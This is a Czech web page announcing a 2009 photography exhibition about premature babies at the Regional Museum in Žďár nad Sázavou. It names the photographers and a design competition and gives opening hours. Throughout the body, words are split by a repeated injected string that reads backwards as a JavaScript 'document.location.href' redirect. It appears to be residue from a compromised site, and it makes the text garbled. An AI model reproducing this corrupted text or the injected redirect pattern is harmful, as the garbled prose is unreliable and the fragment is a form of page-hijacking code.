Rainbow page separator

27.8. – 20.9. 2009 Miminka do dlaně, Regionální muzeum Žďár nad Sázavou

Pondělí, 24. srpna 2009

miminko-amalka MIMINKA DO DLANĚ“

27. 8. – 20. 9. 2009

Regionální muzeum, Tvrz 8, Žďár n. Sázavou

 

Pu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní výstava fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografií „Miminka do dlaně“ zachycuje příběhy předčasně narozených miminek a vypráví příběhy, které prožily a napsaly samy maminky.
Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tograf Zdeněk Málek zaznamenal čtyři příběhy předčasně narozených dětí, Jakoubka, Floriánka, Adámka a Amálky. Jejich osudy jsou rámovány fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografiemi v inkubá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru a příběhy psanými rodiči. Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie byly pořízeny v roce 2008 a 2009.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tograf Doc. Mgr. Jindřich Štreit zachytil všední den na Gynekologicko-porodnické klinice VFN a 1. LF UK v Praze v Apolinářské ulici, při tzv. „klokánkování“, přikládání nahého miminka rodičům na hrudník, kůží na kůži. Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie vznikly v roce 2009.

miminka-do-dlane-1Součástí projektu „Miminka do dlaně“ se stala také soutěž „Design pro  nejmenší miminka“. Vítězné práce jsou součástí výstavy společně s citacemi z knihy Otázky od MUDr. Lumíra Kan[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tora.

Otevírací doba:

denně mimo pondělí od 09:00 – 12:00 a 12:30 – 17:00